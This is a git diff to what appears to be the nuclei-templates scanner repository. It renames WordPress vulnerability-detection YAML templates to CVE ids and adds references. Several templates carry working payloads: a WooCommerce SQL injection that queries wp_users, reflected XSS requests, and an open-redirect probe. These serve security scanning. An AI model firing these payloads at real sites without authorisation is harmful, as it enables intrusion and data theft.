diff --git a/vulnerabilities/wordpress/sniplets-xss.yaml b/cves/2008/CVE-2008-1060.yaml
similarity index 88%
rename from vulnerabilities/wordpress/sniplets-xss.yaml
rename to cves/2008/CVE-2008-1060.yaml
index 195e8e384f..449056a138 100644
--- a/vulnerabilities/wordpress/sniplets-xss.yaml
+++ b/cves/2008/CVE-2008-1060.yaml
@@ -1,4 +1,4 @@
-id: sniplets-xss
+id: CVE-2008-1060
info:
name: Wordpress Plugin Sniplets - Cross-Site Scripting
@@ -7,6 +7,7 @@ info:
description: Cross-site scripting (XSS) on Wordpress Plugin Sniplets
reference:
- https://www.exploit-db.com/exploits/5194
+ - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
tags: xss,wordpress,wp-plugin,wp
requests:
diff --git a/vulnerabilities/wordpress/sniplets-lfi.yaml b/cves/2008/CVE-2008-1061.yaml
similarity index 86%
rename from vulnerabilities/wordpress/sniplets-lfi.yaml
rename to cves/2008/CVE-2008-1061.yaml
index b3172af4e8..604af9ca09 100644
--- a/vulnerabilities/wordpress/sniplets-lfi.yaml
+++ b/cves/2008/CVE-2008-1061.yaml
@@ -1,4 +1,4 @@
-id: sniplets-lfi
+id: CVE-2008-1061
info:
name: WordPress Sniplets 1.1.2 - Local File Inclusion
@@ -7,10 +7,12 @@ info:
description: WordPress Sniplets 1.1.2 is vulnerable to local file inclusion.
reference:
- https://www.exploit-db.com/exploits/5194
+ - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
+ cve-id: CVE-2008-1061
tags: wordpress,wp-plugin,lfi,wp
requests:
diff --git a/vulnerabilities/wordpress/db-backup-lfi.yaml b/cves/2015/CVE-2014-9119.yaml
similarity index 96%
rename from vulnerabilities/wordpress/db-backup-lfi.yaml
rename to cves/2015/CVE-2014-9119.yaml
index ad45d744d3..7cfeda3da7 100644
--- a/vulnerabilities/wordpress/db-backup-lfi.yaml
+++ b/cves/2015/CVE-2014-9119.yaml
@@ -1,4 +1,4 @@
-id: db-backup-lfi
+id: CVE-2014-9119
info:
name: WordPress DB Backup <=4.5 - Local File Inclusion
@@ -12,6 +12,7 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
+ cve-id: CVE-2014-9119
tags: wordpress,wp-plugin,lfi,wp
requests:
diff --git a/vulnerabilities/wordpress/candidate-application-lfi.yaml b/cves/2015/CVE-2015-1000005.yaml
similarity index 94%
rename from vulnerabilities/wordpress/candidate-application-lfi.yaml
rename to cves/2015/CVE-2015-1000005.yaml
index cdc97aa53a..44709f6368 100644
--- a/vulnerabilities/wordpress/candidate-application-lfi.yaml
+++ b/cves/2015/CVE-2015-1000005.yaml
@@ -1,4 +1,4 @@
-id: candidate-application-lfi
+id: CVE-2015-1000005
info:
name: WordPress Candidate Application Form <= 1.3 - Local File Inclusion
@@ -11,6 +11,7 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-22
+ cve-id: CVE-2015-1000005
tags: wordpress,wp-plugin,lfi,wp
requests:
diff --git a/vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml b/cves/2015/CVE-2015-1000010.yaml
similarity index 82%
rename from vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml
rename to cves/2015/CVE-2015-1000010.yaml
index 5214a72c67..1ef473f718 100644
--- a/vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml
+++ b/cves/2015/CVE-2015-1000010.yaml
@@ -1,16 +1,18 @@
-id: simple-image-manipulator-lfi
+id: CVE-2015-1000010
info:
- name: WordPress Simple Image Manipulator 1.0 - Local File Inclusion
+ name: WordPress Simple Image Manipulator < 1.0 - Local File Inclusion
author: dhiyaneshDK
severity: high
description: WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location.
reference:
- https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
+ - https://wpscan.com/vulnerability/40e84e85-7176-4552-b021-6963d0396543
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
+ cve-id: CVE-2015-1000010
tags: wordpress,wp-plugin,lfi,wp
requests:
diff --git a/vulnerabilities/wordpress/wp-revslider-file-download.yaml b/cves/2015/CVE-2015-1579.yaml
similarity index 86%
rename from vulnerabilities/wordpress/wp-revslider-file-download.yaml
rename to cves/2015/CVE-2015-1579.yaml
index a2c97e0a18..46af5fe0a3 100644
--- a/vulnerabilities/wordpress/wp-revslider-file-download.yaml
+++ b/cves/2015/CVE-2015-1579.yaml
@@ -1,17 +1,19 @@
-id: wp-revslider-file-download
+id: CVE-2015-1579
info:
- name: Wordpress Revslider - Local File Inclusion
+ name: WordPress Slider Revolution - Local File Disclosure
author: pussycat0x
severity: high
description: WordPress Revslider is affected by an unauthenticated file retrieval vulnerability, which could result in attacker downloading the wp-config.php file.
reference:
- https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
- https://cxsecurity.com/issue/WLB-2021090129
+ - https://wpscan.com/vulnerability/4b077805-5dc0-4172-970e-cc3d67964f80
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
+ cve-id: CVE-2015-1579
metadata:
google-dork: inurl:/wp-content/plugins/revslider
tags: wordpress,wp-plugin,lfi,revslider
diff --git a/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml b/cves/2020/CVE-2020-8772.yaml
similarity index 91%
rename from vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml
rename to cves/2020/CVE-2020-8772.yaml
index df56152a95..a6eed0faea 100644
--- a/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml
+++ b/cves/2020/CVE-2020-8772.yaml
@@ -1,7 +1,7 @@
-id: wordpress-infinitewp-auth-bypass
+id: CVE-2020-8772
info:
- name: WordPress InfiniteWP Client Authentication Bypass
+ name: InfiniteWP Client < 1.9.4.5 - Authentication Bypass
author: princechaddha
severity: critical
description: InfiniteWP Client plugin versions 1.9.4.4 or earlier contain a critical authentication bypass vulnerability. InfiniteWP Client is a plugin that, when installed on a WordPress site, allows a site owner
@@ -9,9 +9,11 @@ info:
reference:
- https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/
- https://wordpress.org/plugins/iwp-client/#developers
+ - https://wpscan.com/vulnerability/fac62d36-0fa1-4b43-8f5c-bddbd0cff140
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
+ cve-id: CVE-2020-8772
remediation: Upgrade to InfiniteWP Client 1.9.4.5 or higher.
tags: wordpress,auth-bypass,wp-plugin
diff --git a/vulnerabilities/wordpress/ninjaform-open-redirect.yaml b/cves/2021/CVE-2021-24165.yaml
similarity index 97%
rename from vulnerabilities/wordpress/ninjaform-open-redirect.yaml
rename to cves/2021/CVE-2021-24165.yaml
index ba9879a567..18143a6626 100644
--- a/vulnerabilities/wordpress/ninjaform-open-redirect.yaml
+++ b/cves/2021/CVE-2021-24165.yaml
@@ -1,4 +1,4 @@
-id: ninjaform-open-redirect
+id: CVE-2021-24165
info:
name: Ninja Forms < 3.4.34 - Administrator Open Redirect
diff --git a/cves/2021/CVE-2021-25112.yaml b/cves/2021/CVE-2021-25112.yaml
index 1705945685..af81e3f429 100644
--- a/cves/2021/CVE-2021-25112.yaml
+++ b/cves/2021/CVE-2021-25112.yaml
@@ -1,20 +1,13 @@
id: CVE-2021-25112
info:
- name: WordPress WHMCS Bridge < 6.4b - Cross-Site Scripting
- author: DhiyaneshDK
+ name: WHMCS Bridge < 6.4b - Reflected Cross-Site Scripting (XSS)
+ author: dhiyaneshDk
severity: medium
- description: WordPress WHMCS Bridge < 6.4b is susceptible to authenticated reflected cross-site scripting because the plugin does not sanitize and escape the error parameter before outputting it back in admin dashboard.
+ description: The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting
reference:
- https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25112
- - https://plugins.trac.wordpress.org/changeset/2659751
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.1
- cve-id: CVE-2021-25112
- cwe-id: CWE-79
- tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated
+ tags: wordpress,wp-plugin,authenticated,whmcs,xss
requests:
- raw:
@@ -26,7 +19,6 @@ requests:
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
-
- |
GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1
Host: {{Hostname}}
@@ -37,7 +29,8 @@ requests:
- type: word
part: body
words:
- - ""
+ - ""
+ condition: and
- type: word
part: header
@@ -47,5 +40,3 @@ requests:
- type: status
status:
- 200
-
-# Enhanced by mp on 2022/04/21
diff --git a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml b/cves/2021/CVE-2021-32789.yaml
similarity index 76%
rename from vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
rename to cves/2021/CVE-2021-32789.yaml
index 8a96cfe510..604de1a977 100644
--- a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
+++ b/cves/2021/CVE-2021-32789.yaml
@@ -1,26 +1,30 @@
-id: wordpress-woocommerce-sqli
+id: CVE-2021-32789
info:
- name: Woocommerce Unauthenticated SQL Injection
- author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot
+ name: WooCommerce Blocks 2.5 to 5.5 & Woocommerce 3.3 to 5.5 - Authenticated ? & Unauthenticated SQL Injection
+ author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot,akincibor
severity: critical
description: The Woocommerce plugin for Wordpress contains an unauthenticated SQL injection vulnerability.
reference:
- https://woocommerce.com/posts/critical-vulnerability-detected-july-2021
- https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx
- https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/
+ - https://wpscan.com/vulnerability/1212fec8-1fde-41e5-af70-abdd7ffe5379 #CVE-2021-32790 (Authenticated ?)
+ - https://wpscan.com/vulnerability/0f2089dc-9376-4d7d-95a2-25c99526804a #CVE-2021-32789
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-89
- tags: wordpress,woocommerce,sqli,wp-plugin,injection
+ cve-id: CVE-2021-32789
+ tags: wordpress,woocommerce,sqli,wp-plugin,injection,wp
requests:
- method: GET
path:
- - '{{BaseURL}}/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
- '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
+ - '{{BaseURL}}/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
+ stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
diff --git a/vulnerabilities/wordpress/accessibility-helper-xss.yaml b/cves/2022/CVE-2022-0150.yaml
similarity index 96%
rename from vulnerabilities/wordpress/accessibility-helper-xss.yaml
rename to cves/2022/CVE-2022-0150.yaml
index e1b5a6ec3a..63fc691e1e 100644
--- a/vulnerabilities/wordpress/accessibility-helper-xss.yaml
+++ b/cves/2022/CVE-2022-0150.yaml
@@ -1,4 +1,4 @@
-id: accessibility-helper-xss
+id: CVE-2022-0150
info:
name: WP Accessibility Helper (WAH) < 0.6.0.7 - Reflected Cross-Site Scripting (XSS)
diff --git a/vulnerabilities/wordpress/admin-word-count-column-lfi.yaml b/cves/2022/CVE-2022-1390.yaml
similarity index 68%
rename from vulnerabilities/wordpress/admin-word-count-column-lfi.yaml
rename to cves/2022/CVE-2022-1390.yaml
index b337563594..11a4f3925f 100644
--- a/vulnerabilities/wordpress/admin-word-count-column-lfi.yaml
+++ b/cves/2022/CVE-2022-1390.yaml
@@ -1,18 +1,20 @@
-id: admin-word-count-column-lfi
+id: CVE-2022-1390
info:
name: WordPress Admin Word Count Column 2.2 - Local File Inclusion
author: daffainfo,Splint3r7
severity: high
- description: WordPress Admin Word Count Column 2.2 is vulnerable to local file inclusion.
+ description: The plugin does not validate the path parameter given to readfile(), which could allow unauthenticated attackers to read arbitrary files on server running old version of PHP susceptible to the null byte technique. This could also lead to RCE by using a Phar Deserialization technique.
reference:
- https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html
- https://wordpress.org/plugins/admin-word-count-column/
+ - https://wpscan.com/vulnerability/6293b319-dc4f-4412-9d56-55744246c990
remediation: This plugin has been closed as of March 29, 2022 and is not available for download.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
+ cve-id: CVE-2022-1390
tags: wordpress,wp-plugin,lfi,wp
requests:
diff --git a/vulnerabilities/wordpress/cab-fare-calculator-lfi.yaml b/cves/2022/CVE-2022-1391.yaml
similarity index 80%
rename from vulnerabilities/wordpress/cab-fare-calculator-lfi.yaml
rename to cves/2022/CVE-2022-1391.yaml
index 44c69bf0ff..f89549d19b 100644
--- a/vulnerabilities/wordpress/cab-fare-calculator-lfi.yaml
+++ b/cves/2022/CVE-2022-1391.yaml
@@ -1,17 +1,19 @@
-id: cab-fare-calculator-lfi
+id: CVE-2022-1391
info:
- name: WordPress Cab fare calculator 1.0.3 - Local File Inclusion
+ name: WordPress Cab fare calculator < 1.0.4 - Local File Inclusion
author: Hassan Khan Yusufzai - Splint3r7
severity: high
description: WordPress Cab fare calculator 1.0.3 is vulnerable to local file inclusion.
reference:
- https://www.exploit-db.com/exploits/50843
- https://wordpress.org/plugins/cab-fare-calculator
+ - https://wpscan.com/vulnerability/680121fe-6668-4c1a-a30d-e70dd9be5aac
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
+ cve-id: CVE-2022-1391
tags: wordpress,wp-plugin,lfi,wp
requests:
diff --git a/vulnerabilities/wordpress/ad-widget-lfi.yaml b/vulnerabilities/wordpress/ad-widget-lfi.yaml
index 125fb8aa54..2bfbe00c93 100644
--- a/vulnerabilities/wordpress/ad-widget-lfi.yaml
+++ b/vulnerabilities/wordpress/ad-widget-lfi.yaml
@@ -8,6 +8,7 @@ info:
reference:
- https://cxsecurity.com/issue/WLB-2017100084
- https://plugins.trac.wordpress.org/changeset/1628751/ad-widget
+ - https://wpscan.com/vulnerability/caca21fe-56bf-4d4c-afc8-4a218e52f0a2
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
diff --git a/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml b/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml
index 2a341dfb38..18c995d3fa 100644
--- a/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml
+++ b/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml
@@ -8,6 +8,7 @@ info:
reference:
- https://wpscan.com/vulnerability/9873
- https://id.wordpress.org/plugins/advanced-access-manager/
+ - https://wpscan.com/vulnerability/dfe62ff5-956c-4403-b3fd-55677628036b
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
diff --git a/vulnerabilities/wordpress/brandfolder-open-redirect.yaml b/vulnerabilities/wordpress/brandfolder-open-redirect.yaml
index 7c050c1701..f8896d3c0c 100644
--- a/vulnerabilities/wordpress/brandfolder-open-redirect.yaml
+++ b/vulnerabilities/wordpress/brandfolder-open-redirect.yaml
@@ -1,7 +1,7 @@
id: brandfolder-open-redirect
info:
- name: WordPress Brandfolder - Remote/Local File Inclusion
+ name: WordPress Brandfolder - Open Redirect
author: 0x_Akoko
severity: low
description: WordPress Brandfolder is vulnerable to remote/local file inclusion and allows remote attackers to inject an arbitrary URL into the 'callback.php' endpoint via the 'wp_abspath' parameter which will redirect the victim to it.
diff --git a/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml b/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml
index 02e6e97e29..7457ff109d 100644
--- a/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml
+++ b/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml
@@ -1,10 +1,10 @@
id: eatery-restaurant-open-redirect
info:
- name: WordPress Attitude Themes 1.1.1 Open Redirection
+ name: WordPress Eatery Restaurant Themes < 2.2 - Open Redirection
author: 0x_Akoko
severity: low
- description: The WordPress Attitude Themes allows remote attackers to redirect users to an attacker controlled URL.
+ description: The WordPress Eatery Themes allows remote attackers to redirect users to an attacker controlled URL.
reference:
- https://cxsecurity.com/issue/WLB-2020030183
tags: wordpress,wp-theme,redirect
diff --git a/vulnerabilities/wordpress/feedwordpress-xss.yaml b/vulnerabilities/wordpress/feedwordpress-xss.yaml
deleted file mode 100644
index 20cc24cc81..0000000000
--- a/vulnerabilities/wordpress/feedwordpress-xss.yaml
+++ /dev/null
@@ -1,41 +0,0 @@
-id: feedwordpress-xss
-
-info:
- name: FeedWordPress < 2022.0123 - Reflected Cross-Site Scripting (XSS)
- author: dhiyaneshDk
- severity: medium
- description: The plugin is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter.
- reference:
- - https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571
- tags: wordpress,wp-plugin,xss,feedwordpress,authenticated
-
-requests:
- - raw:
- - |
- POST /wp-login.php HTTP/1.1
- Host: {{Hostname}}
- Origin: {{RootURL}}
- Content-Type: application/x-www-form-urlencoded
- Cookie: wordpress_test_cookie=WP%20Cookie%20check
-
- log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- - |
- GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
- Host: {{Hostname}}
-
- cookie-reuse: true
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - '">" method="post">'
-
- - type: word
- part: header
- words:
- - text/html
-
- - type: status
- status:
- - 200
diff --git a/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml b/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml
index 5ce4bfe007..cb97256a17 100644
--- a/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml
+++ b/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml
@@ -7,6 +7,7 @@ info:
description: WordPress NativeChurch Theme is vulnerable to local file inclusion in the download.php file.
reference:
- https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html
+ - https://wpscan.com/vulnerability/2e1062ed-0c48-473f-aab2-20ac9d4c72b1
tags: wordpress,wp-theme,lfi
requests:
diff --git a/vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml b/vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml
deleted file mode 100644
index 040b58bc74..0000000000
--- a/vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: newsletter-manager-open-redirect
-
-info:
- name: Newsletter Manager < 1.5 - Unauthenticated Open Redirect
- author: akincibor
- severity: low
- description: |
- The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header() PHP function, leading to an open redirect issue.
- reference:
- - https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1
- metadata:
- verified: true
- tags: wp-plugin,redirect,wordpress,wp,unauth
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL2ludGVyYWN0LnNo"
-
- matchers:
- - type: regex
- part: header
- regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/vulnerabilities/wordpress/sassy-social-share.yaml b/vulnerabilities/wordpress/sassy-social-share.yaml
index 8d425c291c..dbfb112d7b 100644
--- a/vulnerabilities/wordpress/sassy-social-share.yaml
+++ b/vulnerabilities/wordpress/sassy-social-share.yaml
@@ -4,6 +4,9 @@ info:
name: Sassy Social Share <= 3.3.3 - Cross-Site Scripting
author: Random_Robbie
severity: medium
+ description: AJAX endpoints which returns JSON data has no Content-Type header set, and uses default text/html. Any JSON that has HTML will be rendered as such.
+ reference:
+ - https://wpscan.com/vulnerability/4631519b-2060-43a0-b69b-b3d7ed94c705
tags: wordpress,wp-plugin,sassy,xss
requests:
diff --git a/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml b/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml
index d91642cd80..1af0ff6c7e 100644
--- a/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml
+++ b/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml
@@ -1,17 +1,19 @@
-id: video-synchro-pdf-lfi
+id: CVE-2022-1392
info:
name: WordPress Videos sync PDF 1.7.4 - Local File Inclusion
- author: Hassan Khan Yusufzai - Splint3r7
+ author: Splint3r7
severity: high
description: WordPress Videos sync PDF 1.7.4 is vulnerable to local file inclusion.
reference:
- https://www.exploit-db.com/exploits/50844
- https://wordpress.org/plugins/video-synchro-pdf/
+ - https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
+ cve-id: CVE-2022-1392
tags: wordpress,wp-plugin,lfi,wp
requests:
diff --git a/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml b/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml
index 5c7fdc88b3..1af7477154 100644
--- a/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml
+++ b/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml
@@ -1,7 +1,7 @@
id: w3c-total-cache-ssrf
info:
- name: Wordpress W3C Total Cache SSRF <= 0.9.4
+ name: Wordpress W3C Total Cache <= 0.9.4 - Unauthenticated Server Side Request Forgery (SSRF)
author: random_robbie
severity: medium
description: The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.
diff --git a/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml b/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml
index c393680936..7a2f40879e 100644
--- a/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml
+++ b/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml
@@ -4,7 +4,10 @@ info:
name: Social Metrics Tracker <= 1.6.8 - Unauthorised Data Export
author: randomrobbie
severity: medium
- tags: wordpress,wp-plugin
+ description: The lack of proper authorisation when exporting data from the plugin could allow unauthenticated users to get information about the posts and page of the blog, including their author's username and email.
+ reference:
+ - https://wpscan.com/vulnerability/f4eed3ba-2746-426f-b030-a8c432defeb2
+ tags: wordpress,wp-plugin,wp
requests:
- method: GET
diff --git a/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml b/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml
index 4094c066d1..331c52ce5e 100644
--- a/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml
+++ b/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml
@@ -1,12 +1,13 @@
id: wordpress-zebra-form-xss
info:
- name: Wordpress Zebra Form - Cross-Site Scripting
+ name: Zebra_Form Library <= 2.9.8 - Reflected Cross-Site Scripting (XSS)
author: madrobot
severity: medium
reference:
- https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html
- tags: wordpress,xss
+ - https://wpscan.com/vulnerability/e4b796fa-3215-43ff-a6aa-71f6e1db25e5
+ tags: wordpress,xss,wp
requests:
- raw:
diff --git a/vulnerabilities/wordpress/wp-ambience-xss.yaml b/vulnerabilities/wordpress/wp-ambience-xss.yaml
index 846c96eb86..884bae2883 100644
--- a/vulnerabilities/wordpress/wp-ambience-xss.yaml
+++ b/vulnerabilities/wordpress/wp-ambience-xss.yaml
@@ -1,11 +1,12 @@
id: wp-ambience-xss
info:
- name: WordPress Theme Ambience - 'src' Reflected Cross-Site Scripting (XSS)
+ name: WordPress Theme Ambience <= 1.0 - Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference:
- https://www.exploit-db.com/exploits/38568
+ - https://wpscan.com/vulnerability/c465e5c1-fe43-40e9-894a-97b8ac462381
tags: wordpress,xss,wp-plugin
requests:
diff --git a/vulnerabilities/wordpress/wp-church-admin-xss.yaml b/vulnerabilities/wordpress/wp-church-admin-xss.yaml
index dd400c14f6..6a7e64f5db 100644
--- a/vulnerabilities/wordpress/wp-church-admin-xss.yaml
+++ b/vulnerabilities/wordpress/wp-church-admin-xss.yaml
@@ -5,7 +5,7 @@ info:
author: daffainfo
severity: medium
reference:
- - https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html
+ - https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html # Is this stored ?
tags: wordpress,xss,wp-plugin
requests:
diff --git a/vulnerabilities/wordpress/wp-whmcs-xss.yaml b/vulnerabilities/wordpress/wp-whmcs-xss.yaml
deleted file mode 100644
index 69a4a54185..0000000000
--- a/vulnerabilities/wordpress/wp-whmcs-xss.yaml
+++ /dev/null
@@ -1,42 +0,0 @@
-id: wp-whmcs-xss
-
-info:
- name: WHMCS Bridge < 6.4b - Reflected Cross-Site Scripting (XSS)
- author: dhiyaneshDk
- severity: medium
- description: The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting
- reference:
- - https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c
- tags: wordpress,wp-plugin,authenticated,whmcs,xss
-
-requests:
- - raw:
- - |
- POST /wp-login.php HTTP/1.1
- Host: {{Hostname}}
- Origin: {{RootURL}}
- Content-Type: application/x-www-form-urlencoded
- Cookie: wordpress_test_cookie=WP%20Cookie%20check
-
- log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- - |
- GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1
- Host: {{Hostname}}
-
- cookie-reuse: true
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - ""
- condition: and
-
- - type: word
- part: header
- words:
- - text/html
-
- - type: status
- status:
- - 200
diff --git a/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml b/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml
index 3d2d93704e..5d6dbacea6 100644
--- a/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml
+++ b/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml
@@ -1,12 +1,13 @@
id: wp-woocommerce-email-verification
info:
- name: WordPress WooCommerce <1.8.2 - Authentication Bypass
+ name: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass
author: random_robbie,daffianfo
severity: critical
- description: WordPress WooCommerce prior to version 1.8.2 contains a loose comparison issue which could allow any user to log in as administrator.
+ description: Email Verification for WooCommerce Wordpress plugin prior to version 1.8.2 contains a loose comparison issue which could allow any user to log in as administrator.
reference:
- https://wpvulndb.com/vulnerabilities/10318
+ - https://wpscan.com/vulnerability/0c93832c-83db-4053-8a11-70de966bb3a8
classification:
cvss-metrics: CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
diff --git a/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml b/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml
index f3d8f59e94..72bc6269ce 100644
